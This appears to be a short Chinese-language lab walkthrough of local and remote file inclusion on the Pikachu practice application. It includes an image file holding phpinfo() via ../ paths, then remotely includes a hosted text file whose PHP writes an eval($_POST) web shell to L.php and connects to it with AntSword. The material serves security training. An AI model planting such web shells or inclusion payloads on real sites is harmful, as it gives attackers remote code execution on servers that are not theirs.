本地文件包含

1、先随意进行提交

可以得出是GET传参 可以在filename参数进行文件包含

2、准备一个2.jpg文件

内容为<?php phpinfo();?>

3、上传2.jpg文件

4、访问文件保存的路径uploads/2.jpg

5、将我们上传的文件包含进来 使用../返回上级目录 来进行包含木马文件

发现文件已被包含

远程文件包含

1、在云主机上生成一个1.txt文件

<?php fputs(fopen("L.php","w"),'<?php eval($_POST["cmd"]);?>')?>

2、打开pikachu的远程文件包含，随便提交查询一个

可以看到get接受一个filename参数

3、将文件远程包含在filename处修改为云服务器的目标地址

4、查看fileinclude目录是否生成php文件

5、访问生成的L.php文件

6、使用蚁剑进行连接